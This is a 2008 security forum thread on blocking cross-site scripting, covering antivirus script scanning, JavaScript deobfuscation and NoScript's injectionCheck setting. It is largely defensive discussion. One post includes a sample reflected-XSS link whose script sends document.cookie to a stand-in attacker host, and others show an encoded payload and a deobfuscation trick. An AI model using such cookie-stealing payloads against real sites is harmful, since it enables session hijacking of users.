Blocking Cross-site scripting (XSS)

Discussion in 'other security issues & news' started by arran, Feb 24, 2008.

Thread Status:
Not open for further replies.
  1. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Really? That "impossible" something has actually been happening since the day web scanners were created.
     
  2. bellgamin

    bellgamin Registered Member

    Joined:
    Aug 1, 2002
    Posts:
    8,102
    Location:
    Hawaii
    Please elaborate! This is news to me and I am eager to hear more.
     
  3. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    lucas was basically describing exactly what HTTP scanners do: they parse network traffic, including JS, on the fly.

    Of course, each vendor does this with varying detection rates. Given the vast number of methods for obfuscating JavaScript code, it's pretty hard, if not impossible, to build generic decryptors to handle every one of them.

    Lastly, I'd like to know if anyone has concrete evidence that antivirus scanners don't detect javascript containing XSS code. My samples are a bit scarce in this regard, unfortunately.
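    To make the obfuscation point concrete, here is a hypothetical sketch (the encoded string and variable names are invented) of the kind of trivially "encrypted" JavaScript a web scanner has to unravel: the payload only becomes readable after a decode step runs, so a scanner that inspects only the raw bytes never sees it.

```javascript
// Hypothetical example: an XSS payload hidden as a percent-encoded string.
// decodeURIComponent stands in for the legacy unescape() that real
// obfuscated samples often use.
var encoded = "%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E";
var decoded = decodeURIComponent(encoded);
// Only after decoding does the familiar <script> payload appear; a generic
// "decryptor" has to perform this step for every encoding scheme it meets.
```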
     
  4. bellgamin

    bellgamin Registered Member

    Joined:
    Aug 1, 2002
    Posts:
    8,102
    Location:
    Hawaii
    So would I!
     
  5. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    That was my point, sorry for not making it clearer :oops:
    I'd guess that parsing and decrypting every bit of JS should cause a big performance penalty, right?
    I'd like to know too. Detecting an injected form in an otherwise clean/trusted site sounds difficult.
     
  6. Trespasser

    Trespasser Registered Member

    Joined:
    Mar 1, 2005
    Posts:
    1,204
    Location:
    Virginia - Appalachian Mtns
    I'd like to see some info that an antivirus does detect javascript containing XSS code.
     
  7. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Web browsers do it effectively, without much penalty, and adding a layer over it does not appear to be that complicated. As every script must be interpreted, it seems logical that some buffer filtering the JavaScript code before the interpreter receives it should exist... I believe this is what LinkScanner Pro does.

    I think the issue relates more to what each specific browser allows, in terms of commands to be executed, when passed by the interpreter to the engine... That is where it gets complicated, I believe. Maybe something that behaves a bit like a HIPS, but specific to web browsers, would be a nice new innovative technology that might mitigate the risks by allowing users some control over requests, unlike NoScript, which blocks each and every script based...
     
    Last edited: Mar 31, 2008
  8. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Nope. Avira and Filseclab (a Chinese vendor), for example, handle this with aplomb. They have a very "unique" method of accomplishing it, similar to how they handle packed trojans - if you get my drift.

    Kaspersky is also a good performer against scripts. Again, no noticeable slowdown. It may seem difficult to us laypeople, looking at it from an outsider's point of view with no idea how to get it done, but apparently it's very doable for the vendors.
     
  9. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I get your point ;) BTW, are you talking about this Filseclab?
    So we have nothing but wild speculation :( It would be nice if some vendor were willing to share a little more info about the engines they develop.
     
  10. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Just develop your own... simple. Whenever a company offers its source code publicly, it is... well, either an act of desperation or something to be regarded as suspicious... At least that's how I would regard it. Even cooks won't relinquish a personal recipe unless under duress.
     
  11. Cerxes

    Cerxes Registered Member

    Joined:
    Sep 6, 2005
    Posts:
    581
    Location:
    Northern Europe
    ...or they're just applying another economic model for their business.

    /C.
     
  12. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Perhaps... :cautious:
     
  13. Hermescomputers

    Hermescomputers Registered Member

    Joined:
    Jan 9, 2006
    Posts:
    1,069
    Location:
    Toronto, Ontario, Canada, eh?
    Something confuses me a bit about packed trojans, and the "problems" AVs have detecting them...

    I'm assuming you refer to trojans encapsulated within archived executables or cabinets.

    Is it caused by the compression algorithm or by the encryption algorithm? Or is it because both are true, i.e. they are both compressed and encrypted?
     
  14. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Yep. They produce an antivirus product as well, and quite a decent one at that when it comes to regional malware.

    The easiest and quickest way to decrypt JS is to parse it using the browser rendering engine, while applying selective decryption routines to specially encoded parts (unescape, hex shellcode, ALPHA2, etc). This method is sufficient to unravel the majority of encrypted JS code into human-readable text. Some functions, like arguments.callee.toString(), defeat this method, but they're few and far between, and I suppose it might not be too hard to develop special decryption routines to handle them.
     
  15. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    So, considering this, web scanners aren't utterly useless (if you can swallow the slowdown) :)
    But relying on the output of the browser rendering engine may introduce differences in detection rates when dealing with browser-specific code, right?
     
  16. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Some reading on arguments.callee.toString()

    Arguments.callee.toString() demystified
    http://isc.sans.org/diary.html?storyid=3231

    Other diaries of interest to the topic:

    How to stop javascript from websites infecting clients
    http://isc.sans.org/diary.html?storyid=3733

    XSS Incident Handling
    http://isc.sans.org/diary.html?storyid=3420

    Raising the bar: dynamic JavaScript obfuscation
    http://isc.sans.org/diary.html?storyid=3219

    Deobfuscating VBScript
    http://isc.sans.org/diary.html?storyid=3351

    Browser *does* matter, not only for vulnerabilities - a story on JavaScript deobfuscation
    http://isc.sans.org/diary.html?storyid=1519

    Remember that most XSS exploits are the reflective type, so the user has some control
    in deciding whether or not to click on a link that might have code appended to the URL.
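    For illustration, a hypothetical reflected-XSS link of the kind described above (example.com, the q parameter, and the cookie-stealing payload are all invented): the attack code travels inside the URL itself, which is why the user's decision to click matters.

```javascript
// The payload rides in a query parameter; a vulnerable page that echoes
// the parameter back into its HTML unencoded would execute the script.
var payload = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>";
var link = "http://example.com/search?q=" + encodeURIComponent(payload);
// The victim sees an ordinary-looking link to a site they trust.
```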

    Note that the most sensational exploits were those involving users on Social network sites, where users
    seem to click at will on anything.


    ----
    rich
     
  17. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    This "slowdown" you keep mentioning seems to be vendor-specific, at best. Avira and Kaspersky have no problems with it. I haven't personally trialed AVG 8.0, which is rapidly increasing its detection rate for exploits as well, but nobody seems to be complaining about it so far. Which vendors produce this "slowdown" you keep talking about?

    True, but that's just how I speculated it was done. For all we know the AV vendors might have written their own parsing engine.

    A very formidable encryption to crack indeed for the usual, by-the-book analysts, but easily defeated with a very simple, think-outside-the-box method: reference the callee as a separate variable, then stick that variable into the function. Problem solved.
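    A sketch of that workaround (all names hypothetical): the analyst captures the original function's source text once, stores it in a variable, and has the instrumented copy read its key from that fixed string instead of from arguments.callee, so edits to the function no longer change the key.

```javascript
// The original sample's source is saved verbatim before any edits are made.
var originalSource = "function decode(p){var key=arguments.callee.toString().length&0xff;/*...*/}";

// Instrumented copy: same toy XOR cipher as the sample, but keyed off the
// saved source text rather than its own (now modified) body.
function instrumentedDecode(payload) {
  var key = originalSource.length & 0xff;
  var out = "";
  for (var i = 0; i < payload.length; i++) {
    out += String.fromCharCode(payload.charCodeAt(i) ^ key);
  }
  return out; // the analyst can now log the plaintext instead of eval'ing it
}
```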
     
  18. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    I feel the slowdown with all webscanners, although I should say that the one in avast! is the fastest.
     
  19. Fly

    Fly Registered Member

    Joined:
    Nov 1, 2007
    Posts:
    2,201
    I'd be the last person to promote McAfee (I've been waiting for VIPRE, but McAfee VirusScan Plus hasn't caused any serious problems lately), but if you go to the Security Center, advanced menu, computer and files, configure, you will see a script scanning feature. Someone stated that McAfee does not have an HTTP scanner, but this ability to scan for malicious scripts seems very nice. McAfee actually managed to catch a piece of malicious JavaScript that tried to install a trojan. Both were detected in real time and their installation was prevented. (This was the ONE infection in two or three years.)

    I have no idea if it was really cross-site scripting. (The McAfee SiteAdvisor marked the webpage as safe). Scanning for scripts is a major, if not THE major, way McAfee 'protects' your computer. The script scanning feature suggests that it's at least partially heuristic.

    With infection by malicious scripts being one of the major attack vectors, using a script to catch malicious scripts actually seems cool. (I'm very conservative regarding downloading programs, ActiveX, etc., and I don't use P2P.)
    As far as I know, McAfee runs two scripts on my computer, one being SiteAdvisor, the other the main (?) real-time protection feature of McAfee.
    (I got that information from Spy Sweeper.)

    I'm not aware of any other antivirus programs that use scripts as a major part of their real-time protection. Does anyone know? What do you think of that approach?
     
  20. tlu

    tlu Guest

    Yes. Giorgio is closely monitoring http://sla.ckers.org/forum/list.php?3 which is probably the best source if you're interested in the newest XSS attack types.

    There is (or better: was) an XSS Cheat Sheet by RSnake at http://ha.ckers.org/xssAttacks.xml that is a sort of compilation of the known XSS attack vectors, regarded as probably the definitive list. However, that domain is offline at the moment - I don't know what happened to it.

    BTW: Giorgio is also running another site called http://hackademix.net/ where he promotes Noscript, of course, but which contains very interesting information about XSS and other topics.
     
  21. solcroft

    solcroft Registered Member

    Joined:
    Jun 1, 2006
    Posts:
    1,639
    Thanks tlu. Very useful information, as always.
     
  22. tlu

    tlu Guest

    No, not when it comes to XSS. See also the quotes in Firebytes' post #10

    Yes. The same answer as above applies. I'd also suggest setting noscript.injectionCheck in about:config to "3". Giorgio wrote about this setting on this site:

    " Setting injectionCheck to 3 does provide the strongest protection, since it checks also injections in requests from a certain site to itself.
    This would prevent, for instance, reflective XSS attacks launched by clicking a link inside a site you trust (e.g. in a blog comment) and directed to the site itself.
    The downside would be dealing with false positives on sites where you're supposed to enter stuff looking like code in search forms or other input fields, e.g. on a programming-devoted forum.

    I believe a value of 2 draws a good usability/security balance most of the time (checking all the requests from a certain site to a different site), and that's why I'm using it as the default, especially because really valuable sites (e.g. your bank) usually don't allow users to post and publish links or any other content.

    On the other hand, if you use one of those promiscuous places called "social web sites" and you want to protect your profile or other data you deem valuable stored on that site from other users of the same community, setting injectionCheck to 3 may be a good idea. "

    No, since XSS is not the only problem. Most security leaks in Firefox (and other browsers) are somehow related to Javascript. Besides, on blacklisted sites you are also protected against leaks in plugins like Java, Flash etc.
     
  23. tlu

    tlu Guest

    This is not correct with regard to XSS - see my previous post.
     
  24. Stijnson

    Stijnson Registered Member

    Joined:
    Nov 7, 2007
    Posts:
    533
    Location:
    Paranoia Heaven
    Sorry to be such a n00b (but I'm learning new things here at Wilders every day), but wouldn't browsing with FF+NS+SandboxIE cover these attacks?
     
  25. tlu

    tlu Guest

    o_O I don't know your surfing habits, of course, but I guess that probably more than 80% of all sites you open every day are the same - like this forum. If you trust them you have to whitelist them just once and Noscript will remember them till eternity. I can't see your problem. Yes - you have to decide for every new site but that's the logic of this approach. And most sites you stumble upon (e.g. via Google) will work (i.e. are at least viewable) without having them whitelisted.
     